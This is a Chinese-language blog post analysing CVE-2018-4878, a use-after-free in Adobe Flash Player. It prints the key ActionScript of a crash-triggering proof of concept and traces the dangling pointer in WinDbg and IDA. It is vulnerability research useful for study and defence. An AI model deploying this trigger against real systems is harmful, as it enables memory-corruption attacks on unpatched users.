CVE-2018-4878

0x00前言

该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本

0x01 poc

Poc

这里只列出关键代码

public function triggeruaf() : void {

              var sdk :PSDK = null;

              var dispatch:PSDKEventDispatcher = null;

 
              sdk = PSDK.pSDK;

              dispatch = sdk.createDispatcher();

 
              this.mediaplayer = sdk.createMediaPlayer(dispatch);

              this.listener = new MyListener();

              this.mediaplayer.drmManager.initialize(this.listener);

              this.listener = null;

       }

             
       public function exploit():void {

              this.triggeruaf();

              try {

                     new LocalConnection().connect("test");

                     new LocalConnection().connect("test");

              } catch (e:Error) {

              }

       }

主要就是以一个listener类实例为参数初始化了一个drmManager对象,之后就将listener类实例赋值为NULL,其中listener类为

用FlashDevelop编译后生成Poc.swf

用Windbg附加IE打开Poc.swf,程序崩溃

可见直接使用ecx传递了一个对象

根据汇编代码可断定,ecx偏移0x0c处为某对象指针,而此对象已经全是0,造成了悬挂指针。再看poc脚本中,把一个MyListener(实现了DRMOperationCompleteListener接口)类型对象赋值null。所以可猜测ecx->0x0c为MyListener对象。

用ida找到触发漏洞的函数

函数在对象的虚表中

sub_1036E28A即触发崩溃的方法。

根据虚函数表引用找到对象赋值方法,即脚本中的initialize,这里是函数sub_1037AB11

重新附加IE,在initialize函数下断,打开poc.swf,程序在sub_1037AB11处断下

按F10单步执行

可以看到esi + 0x0c 处为DRMOperationCompleteListener实例指针,它里面的内容此时不为0

按g让程序执行,程序崩溃

结合poc代码我们可以得出结论:MyListener实例在被置null之后被垃圾回收,而在对象中还留存着实例指针,因此存在悬挂指针问题。

posted @ 2018-03-15 21:29  五千年木  阅读(572)  评论(0编辑  收藏  举报